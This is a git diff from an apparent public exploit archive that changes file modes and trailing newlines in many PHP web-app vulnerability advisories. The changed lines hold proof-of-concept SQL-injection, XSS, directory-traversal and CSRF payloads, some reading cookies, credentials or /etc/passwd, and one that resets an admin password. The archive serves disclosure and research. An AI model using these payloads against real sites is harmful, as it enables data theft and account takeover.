value="1"> <input type="submit" name="Submit" value="Update"> </form> <form action="http://www.example.com/recipes/admin/adminpass.php" method="POST"> <input type="password" name="AdminPass" value="hacked"> <input type="password" name="cAdminPass" value="hacked"> <input type="submit" name="submit" value="Update Password"> </form> <form action="http://www.example.com/recipes/admin/send_email_users.php" method="POST"> <input type="hidden" name="from_email" value="support@site.com"> <input type="hidden" name="subject" value="Subject"> <input type="hidden" name="message" value="Free your mind and the ass will follow!"> <input type="hidden" name="emailtype" value=""> <input type="submit" name="Submit" value="Send"> </form> \ No newline at end of file diff --git a/platforms/php/webapps/34353.txt b/platforms/php/webapps/34353.txt old mode 100755 new mode 100644 index c9677fbd3..70dc70145 --- a/platforms/php/webapps/34353.txt +++ b/platforms/php/webapps/34353.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc SnowFlake CMS 1.0 beta5.2 is vulnerable. -http://www.example.com/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29, \ No newline at end of file +http://www.example.com/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29, \ No newline at end of file diff --git a/platforms/php/webapps/34354.txt b/platforms/php/webapps/34354.txt old mode 100755 new mode 100644 index 3145541ad..8efc03671 --- a/platforms/php/webapps/34354.txt +++ b/platforms/php/webapps/34354.txt @@ -10,4 +10,4 @@ The following example URI's are available: http://www.example.com/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login -http://www.example.com/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html \ No newline at end of file +http://www.example.com/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html \ No newline at end of file diff --git a/platforms/php/webapps/34357.txt b/platforms/php/webapps/34357.txt old mode 100755 new mode 100644 index 93f117be0..def685e28 --- a/platforms/php/webapps/34357.txt +++ b/platforms/php/webapps/34357.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to execute arbitrary script code i Ez FAQ Maker 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/faq/index.php?action=showcat&cid=8&sid="[XSS] \ No newline at end of file +http://www.example.com/faq/index.php?action=showcat&cid=8&sid="[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3436.txt b/platforms/php/webapps/3436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34365.txt b/platforms/php/webapps/34365.txt old mode 100755 new mode 100644 index 38a48ec97..eb6573066 --- a/platforms/php/webapps/34365.txt +++ b/platforms/php/webapps/34365.txt @@ -12,4 +12,4 @@ http://www.example.com/site/cont_index.php?cms_id=PAGE_ID"><script>alert(documen <form action="http://www.example.com/cms//edit/tpl_edit_action.php" method="post" name="main" > <input type="hidden" name="action" value="save" /> <input type="hidden" name="value[headline]" value='headl2<img src=x onerror=alert(234)>' /> <input type="hidden" name="winid" value="0" /> </form> <script> document.main.submit(); </script> Second code: <form action="http://www.example.com/cms//edit/tpl_edit_action.php" method="post" name="main" > <input type="hidden" name="action" value="value" /> <input type="hidden" name="tabid" value="headline" /> <input type="hidden" name="winid" value="0" /> </form> <script> document.main.submit(); </script> -<form action="http://www.example.com/cms/edit/tpl_backup_action.php" method="post" name="main" > <input type="hidden" name="action" value="message" /> <input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' /> </form> <script> document.main.submit(); </script> \ No newline at end of file +<form action="http://www.example.com/cms/edit/tpl_backup_action.php" method="post" name="main" > <input type="hidden" name="action" value="message" /> <input type="hidden" name="text" value='help text<img src=x onerror=alert(document.cookie)>' /> </form> <script> document.main.submit(); </script> \ No newline at end of file diff --git a/platforms/php/webapps/34366.txt b/platforms/php/webapps/34366.txt old mode 100755 new mode 100644 index 1d19722d1..285d996c4 --- a/platforms/php/webapps/34366.txt +++ b/platforms/php/webapps/34366.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example URI is available: -http://www.example.com/news/?calendar = "; alert (" ONsec.ru% 20Russian% 20security% 20team \ n \ n "% 2Bdocument.cookie); / / \ No newline at end of file +http://www.example.com/news/?calendar = "; alert (" ONsec.ru% 20Russian% 20security% 20team \ n \ n "% 2Bdocument.cookie); / / \ No newline at end of file diff --git a/platforms/php/webapps/34367.txt b/platforms/php/webapps/34367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34373.txt b/platforms/php/webapps/34373.txt old mode 100755 new mode 100644 index 756063f0f..ae5b340b0 --- a/platforms/php/webapps/34373.txt +++ b/platforms/php/webapps/34373.txt @@ -14,4 +14,4 @@ Cross site scripting: SQL Injection: -1) http://www.example.com/cms/ua%20where%201=1--%20/ \ No newline at end of file +1) http://www.example.com/cms/ua%20where%201=1--%20/ \ No newline at end of file diff --git a/platforms/php/webapps/34374.txt b/platforms/php/webapps/34374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34377.txt b/platforms/php/webapps/34377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34378.txt b/platforms/php/webapps/34378.txt old mode 100755 new mode 100644 index 50987e75c..71dc19895 --- a/platforms/php/webapps/34378.txt +++ b/platforms/php/webapps/34378.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow DPI version 1.1f is vulnerable; other versions may also be affected. -http://www.example.com/path/images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E \ No newline at end of file +http://www.example.com/path/images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34379.html b/platforms/php/webapps/34379.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3438.txt b/platforms/php/webapps/3438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34381.txt b/platforms/php/webapps/34381.txt old mode 100755 new mode 100644 index c0d6c4c02..05798bf96 --- a/platforms/php/webapps/34381.txt +++ b/platforms/php/webapps/34381.txt @@ -37,5 +37,4 @@ Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2 Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload *************************************************** -[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members. - \ No newline at end of file +[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members. \ No newline at end of file diff --git a/platforms/php/webapps/34383.txt b/platforms/php/webapps/34383.txt old mode 100755 new mode 100644 index d181d68aa..be192ba1c --- a/platforms/php/webapps/34383.txt +++ b/platforms/php/webapps/34383.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Social Media 2.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00 \ No newline at end of file +http://www.example.com/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00 \ No newline at end of file diff --git a/platforms/php/webapps/34386.txt b/platforms/php/webapps/34386.txt old mode 100755 new mode 100644 index f64a2292f..42c0f3f85 --- a/platforms/php/webapps/34386.txt +++ b/platforms/php/webapps/34386.txt @@ -9,4 +9,4 @@ Cetera eCommerce 14.0 and previous versions are vulnerable; other versions may a The following example URIs are given: http://www.example.com/cms/templates/banner.php?bannerId=1%20and%20version()=5 -http://www.example.com/cms/templates/bannerlist.php?page=-1 \ No newline at end of file +http://www.example.com/cms/templates/bannerlist.php?page=-1 \ No newline at end of file diff --git a/platforms/php/webapps/34387.txt b/platforms/php/webapps/34387.txt old mode 100755 new mode 100644 index 6b6235078..bc6c41f2e --- a/platforms/php/webapps/34387.txt +++ b/platforms/php/webapps/34387.txt @@ -18,4 +18,4 @@ http://www.example.com/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(d http://www.example.com/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34388.txt b/platforms/php/webapps/34388.txt old mode 100755 new mode 100644 index 970aa63ce..6e8b4ea10 --- a/platforms/php/webapps/34388.txt +++ b/platforms/php/webapps/34388.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SPIP version 2.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/spip.php?page=informer_auteur&var_login[a<script>alert('XSS');</script>a]=aaa \ No newline at end of file +http://www.example.com/spip.php?page=informer_auteur&var_login[a<script>alert('XSS');</script>a]=aaa \ No newline at end of file diff --git a/platforms/php/webapps/34389.txt b/platforms/php/webapps/34389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34391.txt b/platforms/php/webapps/34391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34392.txt b/platforms/php/webapps/34392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34393.txt b/platforms/php/webapps/34393.txt old mode 100755 new mode 100644 index d84c554e3..7149919cf --- a/platforms/php/webapps/34393.txt +++ b/platforms/php/webapps/34393.txt @@ -4,4 +4,4 @@ The 'com_jigsaw' component for Joomla! is prone to a directory-traversal vulnera Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/34396.txt b/platforms/php/webapps/34396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34400.txt b/platforms/php/webapps/34400.txt old mode 100755 new mode 100644 index b5ef9e8f0..184687542 --- a/platforms/php/webapps/34400.txt +++ b/platforms/php/webapps/34400.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow RaidenTunes version 2.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/music_out.php?p=29%27%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file +http://www.example.com/music_out.php?p=29%27%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34401.txt b/platforms/php/webapps/34401.txt old mode 100755 new mode 100644 index 73977ca3c..719528cd8 --- a/platforms/php/webapps/34401.txt +++ b/platforms/php/webapps/34401.txt @@ -4,4 +4,4 @@ PHP168 Template Editor is prone to a directory-traversal vulnerability because i Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the webserver. This may aid in further attacks -http://www.example.com/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php \ No newline at end of file +http://www.example.com/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php \ No newline at end of file diff --git a/platforms/php/webapps/34402.txt b/platforms/php/webapps/34402.txt old mode 100755 new mode 100644 index 30e7cb599..7c0018c9a --- a/platforms/php/webapps/34402.txt +++ b/platforms/php/webapps/34402.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/nothing,important,our.file.name.html%00 -http://www.example.com/?p=../path.to.our.php.file-nothing-important \ No newline at end of file +http://www.example.com/?p=../path.to.our.php.file-nothing-important \ No newline at end of file diff --git a/platforms/php/webapps/34405.txt b/platforms/php/webapps/34405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34410.txt b/platforms/php/webapps/34410.txt old mode 100755 new mode 100644 index 772183018..5100ce9da --- a/platforms/php/webapps/34410.txt +++ b/platforms/php/webapps/34410.txt @@ -16,4 +16,4 @@ HTML Injection SQL Injection -http://www.example.com/group.php?tname=-%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10%20concat(user,0x3a,pass),11,12,13,14,%20from%20xxxxx%20 ... /* \ No newline at end of file +http://www.example.com/group.php?tname=-%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10%20concat(user,0x3a,pass),11,12,13,14,%20from%20xxxxx%20 ... /* \ No newline at end of file diff --git a/platforms/php/webapps/34412.txt b/platforms/php/webapps/34412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34413.txt b/platforms/php/webapps/34413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34414.txt b/platforms/php/webapps/34414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34415.txt b/platforms/php/webapps/34415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34416.txt b/platforms/php/webapps/34416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34417.txt b/platforms/php/webapps/34417.txt old mode 100755 new mode 100644 index 13bd06cc1..d2b8e9e2a --- a/platforms/php/webapps/34417.txt +++ b/platforms/php/webapps/34417.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Prado Portal 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?page=x<img+src%3Dx+onerror%3Dalert(document.cookie)> \ No newline at end of file +http://www.example.com/index.php?page=x<img+src%3Dx+onerror%3Dalert(document.cookie)> \ No newline at end of file diff --git a/platforms/php/webapps/34418.txt b/platforms/php/webapps/34418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34424.txt b/platforms/php/webapps/34424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3443.txt b/platforms/php/webapps/3443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34430.txt b/platforms/php/webapps/34430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34432.txt b/platforms/php/webapps/34432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34433.txt b/platforms/php/webapps/34433.txt old mode 100755 new mode 100644 index 36b1878be..f1ebccc9c --- a/platforms/php/webapps/34433.txt +++ b/platforms/php/webapps/34433.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Simple Directory Listing 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/simpledirectorylisting/SDL2.php?cwdRelPath= '><script>alert(1)</script> \ No newline at end of file +http://www.example.com/simpledirectorylisting/SDL2.php?cwdRelPath= '><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/34436.txt b/platforms/php/webapps/34436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34438.txt b/platforms/php/webapps/34438.txt old mode 100755 new mode 100644 index 106c3dbd1..e6f7265bd --- a/platforms/php/webapps/34438.txt +++ b/platforms/php/webapps/34438.txt @@ -8,4 +8,4 @@ TagCloud version 2.0 is vulnerable; other versions may also be affected. The following example input is available: -'Topic' Field: <script>javascript:alert("lolcats")</script> \ No newline at end of file +'Topic' Field: <script>javascript:alert("lolcats")</script> \ No newline at end of file diff --git a/platforms/php/webapps/34441.txt b/platforms/php/webapps/34441.txt old mode 100755 new mode 100644 index e607743c7..f53118b3b --- a/platforms/php/webapps/34441.txt +++ b/platforms/php/webapps/34441.txt @@ -25,4 +25,4 @@ Stored XSS - proof of concept for Internet Explorer ("style" cannot contain pare Renders into the following HTML code: - <font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font> \ No newline at end of file + <font color='red' /style='color:expression(alert(document.cookie))'>XSS4IE</font> \ No newline at end of file diff --git a/platforms/php/webapps/34443.txt b/platforms/php/webapps/34443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34444.txt b/platforms/php/webapps/34444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34445.txt b/platforms/php/webapps/34445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34446.txt b/platforms/php/webapps/34446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34453.txt b/platforms/php/webapps/34453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34454.txt b/platforms/php/webapps/34454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34455.txt b/platforms/php/webapps/34455.txt old mode 100755 new mode 100644 index 5aebdf615..95429ad4b --- a/platforms/php/webapps/34455.txt +++ b/platforms/php/webapps/34455.txt @@ -5,4 +5,4 @@ Rock Band CMS is prone to multiple SQL-injection vulnerabilities because it fail Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/news.php?year=-2004+UNION+SELECT+1,2,3,4-- -http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4-- \ No newline at end of file +http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4-- \ No newline at end of file diff --git a/platforms/php/webapps/34456.txt b/platforms/php/webapps/34456.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34459.txt b/platforms/php/webapps/34459.txt old mode 100755 new mode 100644 index d62999cac..bbaef2a50 --- a/platforms/php/webapps/34459.txt +++ b/platforms/php/webapps/34459.txt @@ -6,4 +6,4 @@ An attacker may leverage the issues to execute arbitrary script code in the brow Amiro.CMS 5.4.0 is affected; other versions may be vulnerable as well. -'status_msg' = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a: 2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert (document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}} \ No newline at end of file +'status_msg' = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a: 2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert (document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}} \ No newline at end of file diff --git a/platforms/php/webapps/34464.txt b/platforms/php/webapps/34464.txt old mode 100755 new mode 100644 index 971a2c2b5..f6e03db68 --- a/platforms/php/webapps/34464.txt +++ b/platforms/php/webapps/34464.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc SyntaxCMS 1.3 is vulnerable; prior versions may also be affected. -http://www.example.com/content/general/browse/?x=37&y=15&rows_per_page=10+ANY_SQL+--+&page=2 \ No newline at end of file +http://www.example.com/content/general/browse/?x=37&y=15&rows_per_page=10+ANY_SQL+--+&page=2 \ No newline at end of file diff --git a/platforms/php/webapps/34466.txt b/platforms/php/webapps/34466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34467.txt b/platforms/php/webapps/34467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34468.html b/platforms/php/webapps/34468.html old mode 100755 new mode 100644 index 5f7d0e48f..2c21550fb --- a/platforms/php/webapps/34468.html +++ b/platforms/php/webapps/34468.html @@ -25,4 +25,4 @@ document.main.submit(); > <script> > document.main.submit(); > </script> -> \ No newline at end of file +> \ No newline at end of file diff --git a/platforms/php/webapps/34469.html b/platforms/php/webapps/34469.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3447.txt b/platforms/php/webapps/3447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34470.txt b/platforms/php/webapps/34470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34471.txt b/platforms/php/webapps/34471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34472.txt b/platforms/php/webapps/34472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34473.txt b/platforms/php/webapps/34473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34474.txt b/platforms/php/webapps/34474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34475.txt b/platforms/php/webapps/34475.txt old mode 100755 new mode 100644 index d8f237767..6d296bb06 --- a/platforms/php/webapps/34475.txt +++ b/platforms/php/webapps/34475.txt @@ -4,4 +4,4 @@ The 'com_weblinks' component for Joomla! is prone to an SQL-injection vulnerabil Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/{path}/index.php?option=com_weblinks&view=categories&Itemid=[SQL] \ No newline at end of file +http://www.example.com/{path}/index.php?option=com_weblinks&view=categories&Itemid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/34476.txt b/platforms/php/webapps/34476.txt old mode 100755 new mode 100644 index a8ab973dc..080d45ccd --- a/platforms/php/webapps/34476.txt +++ b/platforms/php/webapps/34476.txt @@ -18,4 +18,4 @@ http://www.example.com/admin/settings.php?message=<script>alert(document.cookie) http://www.example.com/admin/changeclothes.php?message=<script>alert(document.cookie);</script> http://www.example.com/admin/settings_theme.php?message=<script>alert(document.cookie);</script> http://www.example.com/admin/themes.php?message=<script>alert(document.cookie);</script> -http://www.example.com/admin/plugins.php?message=<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/admin/plugins.php?message=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/34477.txt b/platforms/php/webapps/34477.txt old mode 100755 new mode 100644 index c5f06f637..b44105673 --- a/platforms/php/webapps/34477.txt +++ b/platforms/php/webapps/34477.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example URI is available: -http://www.example.com/{path}/index.php?option=com_fireboard&Itemid=[SQL] \ No newline at end of file +http://www.example.com/{path}/index.php?option=com_fireboard&Itemid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/34479.html b/platforms/php/webapps/34479.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3448.txt b/platforms/php/webapps/3448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34481.txt b/platforms/php/webapps/34481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34482.txt b/platforms/php/webapps/34482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34483.txt b/platforms/php/webapps/34483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34484.txt b/platforms/php/webapps/34484.txt old mode 100755 new mode 100644 index 95aee04d9..d75757f80 --- a/platforms/php/webapps/34484.txt +++ b/platforms/php/webapps/34484.txt @@ -8,4 +8,4 @@ http://www.example.com/path/index.php?option=com_dirfrm&task=listAll&catid=[SQL Injection]&id=8&Itemid=32 http://www.example.com/path/index.php?option=com_dirfrm&task=listAll&catid=1&id=[SQL -Injection]&Itemid=32 \ No newline at end of file +Injection]&Itemid=32 \ No newline at end of file diff --git a/platforms/php/webapps/34485.txt b/platforms/php/webapps/34485.txt old mode 100755 new mode 100644 index 4f99105e8..c9a7945ee --- a/platforms/php/webapps/34485.txt +++ b/platforms/php/webapps/34485.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FreeSchool 1.1.0 is vulnerable; others may also be affected. -http://www.example.com/biblioteca/index.php?action=bib_searchs&method=searchs&key_words=example%22%27%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file +http://www.example.com/biblioteca/index.php?action=bib_searchs&method=searchs&key_words=example%22%27%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34486.txt b/platforms/php/webapps/34486.txt old mode 100755 new mode 100644 index 739a57b75..a729ceace --- a/platforms/php/webapps/34486.txt +++ b/platforms/php/webapps/34486.txt @@ -4,4 +4,4 @@ PHPCMS2008 is prone to an information-disclosure vulnerability because it fails An attacker can exploit this issue to download local files in the context of the webserver process. This may allow the attacker to obtain sensitive information; other attacks are also possible. -http://www.example.com/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=127.0.0.1&s=m/&d=1 \ No newline at end of file +http://www.example.com/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=127.0.0.1&s=m/&d=1 \ No newline at end of file diff --git a/platforms/php/webapps/34487.txt b/platforms/php/webapps/34487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3449.txt b/platforms/php/webapps/3449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34493.txt b/platforms/php/webapps/34493.txt old mode 100755 new mode 100644 index 85375be4a..f7b633a79 --- a/platforms/php/webapps/34493.txt +++ b/platforms/php/webapps/34493.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()) http://www.example.com/shop.htm?cid=31+and+1=1 -http://www.example.com/shop.htm?cid=31+and+1=100 \ No newline at end of file +http://www.example.com/shop.htm?cid=31+and+1=100 \ No newline at end of file diff --git a/platforms/php/webapps/34494.txt b/platforms/php/webapps/34494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34495.txt b/platforms/php/webapps/34495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34496.txt b/platforms/php/webapps/34496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34497.txt b/platforms/php/webapps/34497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34498.txt b/platforms/php/webapps/34498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34499.txt b/platforms/php/webapps/34499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3450.php b/platforms/php/webapps/3450.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34501.txt b/platforms/php/webapps/34501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34503.txt b/platforms/php/webapps/34503.txt old mode 100755 new mode 100644 index 92d86d4f7..e8e1de14a --- a/platforms/php/webapps/34503.txt +++ b/platforms/php/webapps/34503.txt @@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Syntax Highlighter version 3.0.83 is vulnerable; others may also be affected. -Inject the code ">"">>>><script>location="http://www.alkrsan.net"</script>""""> in index.html \ No newline at end of file +Inject the code ">"">>>><script>location="http://www.alkrsan.net"</script>""""> in index.html \ No newline at end of file diff --git a/platforms/php/webapps/34504.txt b/platforms/php/webapps/34504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34508.txt b/platforms/php/webapps/34508.txt old mode 100755 new mode 100644 index 177ab8c5b..ca6f8f0b6 --- a/platforms/php/webapps/34508.txt +++ b/platforms/php/webapps/34508.txt @@ -10,4 +10,4 @@ username = Sweet'" password = test re password = test email = charif38@hotmail.fr -then register :] \ No newline at end of file +then register :] \ No newline at end of file diff --git a/platforms/php/webapps/34511.txt b/platforms/php/webapps/34511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34514.txt b/platforms/php/webapps/34514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34524.txt b/platforms/php/webapps/34524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34531.txt b/platforms/php/webapps/34531.txt old mode 100755 new mode 100644 index 78b8a38e3..66b2def27 --- a/platforms/php/webapps/34531.txt +++ b/platforms/php/webapps/34531.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to BlastChat Client 3.4 are vulnerable. -http://www.example.com/index.php?option=com_blastchatc&Itemid=" onload="alert(/XSS/)" \ No newline at end of file +http://www.example.com/index.php?option=com_blastchatc&Itemid=" onload="alert(/XSS/)" \ No newline at end of file diff --git a/platforms/php/webapps/34533.txt b/platforms/php/webapps/34533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34534.txt b/platforms/php/webapps/34534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34535.txt b/platforms/php/webapps/34535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34536.txt b/platforms/php/webapps/34536.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34538.txt b/platforms/php/webapps/34538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34539.txt b/platforms/php/webapps/34539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34541.txt b/platforms/php/webapps/34541.txt old mode 100755 new mode 100644 index 41db8a665..b57108908 --- a/platforms/php/webapps/34541.txt +++ b/platforms/php/webapps/34541.txt @@ -7,4 +7,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Inject the following data into the vulnerable fields: -<meta http-equiv="refresh" content="0;url=http://www.example.com/" /> \ No newline at end of file +<meta http-equiv="refresh" content="0;url=http://www.example.com/" /> \ No newline at end of file diff --git a/platforms/php/webapps/34543.txt b/platforms/php/webapps/34543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34544.txt b/platforms/php/webapps/34544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34545.txt b/platforms/php/webapps/34545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34546.txt b/platforms/php/webapps/34546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34547.txt b/platforms/php/webapps/34547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34548.txt b/platforms/php/webapps/34548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34549.txt b/platforms/php/webapps/34549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3455.htm b/platforms/php/webapps/3455.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34550.txt b/platforms/php/webapps/34550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34551.txt b/platforms/php/webapps/34551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34552.txt b/platforms/php/webapps/34552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34553.txt b/platforms/php/webapps/34553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34555.txt b/platforms/php/webapps/34555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34558.txt b/platforms/php/webapps/34558.txt old mode 100755 new mode 100644 diff --git 